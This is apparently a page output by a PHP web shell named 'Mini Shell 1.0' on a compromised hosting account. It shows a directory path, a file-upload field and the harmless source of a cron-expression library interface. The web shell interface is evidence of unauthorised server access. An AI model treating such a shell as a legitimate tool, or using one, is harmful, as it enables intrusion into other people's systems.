HOME


Mini Shell 1.0
DIR: /home/cardxfeb/public_html/vendor/dragonmantank/cron-expression/src/Cron/
Upload File :
Current File : /home/cardxfeb/public_html/vendor/dragonmantank/cron-expression/src/Cron/FieldFactoryInterface.php
<?php

namespace Cron;

interface FieldFactoryInterface
{
    public function getField(int $position): FieldInterface;
}